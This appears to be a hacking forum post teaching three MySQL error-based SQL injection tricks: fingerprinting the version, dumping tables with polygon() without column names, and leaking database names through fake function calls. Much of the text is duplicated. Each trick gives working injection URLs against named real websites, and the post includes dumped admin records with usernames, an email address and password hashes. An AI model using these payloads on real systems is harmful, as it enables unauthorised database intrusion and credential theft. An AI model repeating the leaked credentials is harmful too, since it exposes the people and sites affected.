in this trick, we will be using c-style comments, to know what version we are dealing with.
we will be using error 1064.
a little reminder-
the number in /*!50000*/ represents the version.
if the number is higher than the version itself, it will consider as comment.
the real problem with "one shot", is that we dont know if the injection type is integer or string.
but as we saw on ABIOS, it dosent really matter.
lets check this syntax-
lets say we have a site with version 4.1.22.
id=1 -- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/
first off, the string/integer dosent matter, because of the -- '%0a.
if its string, the injection would be-
if its integer-
the query will get executed no matter what.
and now for the version part.
the red part will consider as comment, because the version is lower than 5 and 6.
the green part will not consider as comment, and the blue part will dissapear, because of the <!, and we will see-
1064: version=4.
demos-
1064: version=5
1064: version=4
another cool thing we can do, is knowing if its integer or string.
lets check that-
1064: string version=5
1064: integer version=4
and we got the version and the type in one request
we will be using error 1064.
a little reminder-
the number in /*!50000*/ represents the version.
if the number is higher than the version itself, it will consider as comment.
the real problem with "one shot", is that we dont know if the injection type is integer or string.
but as we saw on ABIOS, it dosent really matter.
lets check this syntax-
Code:
-- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/
id=1 -- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/
first off, the string/integer dosent matter, because of the -- '%0a.
if its string, the injection would be-
Code:
id='1 -- '%0a syntax
Code:
id=1 -- '%0a syntax
and now for the version part.
the red part will consider as comment, because the version is lower than 5 and 6.
the green part will not consider as comment, and the blue part will dissapear, because of the <!, and we will see-
1064: version=4.
demos-
Code:
http://www.djinsure.com/faq/viewFAQ.php?id=8 -- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/
Code:
http://bridgeyear.com/general.php?id=33 -- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/
another cool thing we can do, is knowing if its integer or string.
lets check that-
Code:
/*!60000 integer version=6<!*/ /*!50000 integer version=5<!*/ /*!40000 integer version=4<!*/ /*!30000 integer version=3<!*/ ' /*!60000 string version=6<!*/ /*!50000 string version=5<!*/ /*!40000 string version=4<!*/ /*!30000 string version=3<!*/
Code:
http://www.djinsure.com/faq/viewFAQ.php?id=8 /*!60000 integer version=6<!*/ /*!50000 integer version=5<!*/ /*!40000 integer version=4<!*/ /*!30000 integer version=3<!*/ ' /*!60000 string version=6<!*/ /*!50000 string version=5<!*/ /*!40000 string version=4<!*/ /*!30000 string version=3<!*/
Code:
http://bridgeyear.com/general.php?id=33 /*!60000 integer version=6<!*/ /*!50000 integer version=5<!*/ /*!40000 integer version=4<!*/ /*!30000 integer version=3<!*/ ' /*!60000 string version=6<!*/ /*!50000 string version=5<!*/ /*!40000 string version=4<!*/ /*!30000 string version=3<!*/
and we got the version and the type in one request
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
trick #2::
In trick #2, i will show you some trick to get the data without write the column names.
we will be using polygon().
things we need-
* version 5.1+
* mysql_error on.
im not gonna explain every detail, im gonna show you the queries and explain why its working.
in sql, to get the whole table content we using-
lets try on polygon()-
Operand should contain 1 column(s)
the way to bypass that is very simple.
(select '3' AS `id`,'admin' AS `user`,'9ba17d7d1ca40550ae551586a6ba612e' AS `password`,'管理员' AS `name`,'管理员' AS `job`,'A001' AS `jobid`,'0' AS `moveable`
we got the data and the column names, lets make some order.
column: id , user, password, name, job, jobid, moveable
data: 3 , admin , 9ba17d7d1ca40550ae551586a6ba612e , 管理员 , 管理员 , A001 , 0.
the problem is its so easy for community-logs.
in other versions, we gotta outsmart this error.
lets take this site for example, not community-log
we can only see the column names.
this happend because we still stuck at the server layer.
to overpower that, we can use a small trick to travel from the server layer to output layer.
we will take our query, and compare it to the same query, to bypass that "Operand should contain x column(s)".
(select 'Diviersicare','kkotanko@diversicare.ca','admin','$1$V7K1PDVx$.P98zhzs/1O/tnbgWwkyX1','2013-09-06','siteowner' from dual)
(select 'SEO Admin','','seoadmin','$1$4jaY6JWQ$DmDTHqJORIEukx30cOb6b0','0000-00-00','seodev' from dual)
and thats the new generation injection, get the data without even write the column names.
we will be using polygon().
things we need-
* version 5.1+
* mysql_error on.
im not gonna explain every detail, im gonna show you the queries and explain why its working.
in sql, to get the whole table content we using-
Code:
SELECT * FROM table;
Code:
http://www.soarland.com/CF_Card_Adapter-catalog-41 and polygon((select * from(select * from C277915_shledlights.snh_base_admin)p)).html
the way to bypass that is very simple.
Code:
http://www.soarland.com/CF_Card_Adapter-catalog-41 and polygon((select 1 from(select * from C277915_shledlights.snh_base_admin)p)).html
we got the data and the column names, lets make some order.
column: id , user, password, name, job, jobid, moveable
data: 3 , admin , 9ba17d7d1ca40550ae551586a6ba612e , 管理员 , 管理员 , A001 , 0.
the problem is its so easy for community-logs.
in other versions, we gotta outsmart this error.
lets take this site for example, not community-log
Code:
http://diversicare.ca/home/ind_comm.php?cid=73 and polygon((select 1 from(select * from siteadmin)x))
this happend because we still stuck at the server layer.
to overpower that, we can use a small trick to travel from the server layer to output layer.
we will take our query, and compare it to the same query, to bypass that "Operand should contain x column(s)".
Code:
http://diversicare.ca/home/ind_comm.php?cid=73 and polygon((select * from(SELECT ((SELECT * from (select * from siteadmin limit 0,1)x) = (select*from siteadmin limit 1) )``)o))
Code:
http://diversicare.ca/home/ind_comm.php?cid=73 and polygon((select * from(SELECT ((SELECT * from (select * from siteadmin limit 1,1)x) = (select*from siteadmin limit 1) )``)o))
and thats the new generation injection, get the data without even write the column names.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
trick #3::
in this this, i will show you a quick trick to get the db name without using letters or numbers.
i will use the v() method.
the v() method is basically write a false function name, to get this error-
FUNCTION database.v dose not exist
example-
db = neonsix_thornbridge.
but we want it without using letters, so we gotta get rid of "or" and "v".
the usage of "or" here is not really OR, is just to connect between the false function to the query.
so, we can use * instead.
* is multiply, and when we multiply by our false function, we get an error.
to replace the "v", we can use _ or $.
so-
in case its integer, we can simply write our false function instead of the parameter value.
other combinations-
in this this, i will show you a quick trick to get the db name without using letters or numbers.
i will use the v() method.
the v() method is basically write a false function name, to get this error-
FUNCTION database.v dose not exist
example-
Code:
http://www.thornbridgebrewery.co.uk/shop.php?catid=2'or v()-- -
FUNCTION neonsix_thornbridge.v does not exist
db = neonsix_thornbridge.
but we want it without using letters, so we gotta get rid of "or" and "v".
the usage of "or" here is not really OR, is just to connect between the false function to the query.
so, we can use * instead.
* is multiply, and when we multiply by our false function, we get an error.
to replace the "v", we can use _ or $.
so-
Code:
http://www.thornbridgebrewery.co.uk/shop.php?catid=2'*_()%23
FUNCTION neonsix_thornbridge._ does not exist
in case its integer, we can simply write our false function instead of the parameter value.
Code:
http://www.cmc.net.pk/gen_cmc.php?id=_()
other combinations-
Code:
_()
$()
`@`()
`anything`()
إرسال تعليق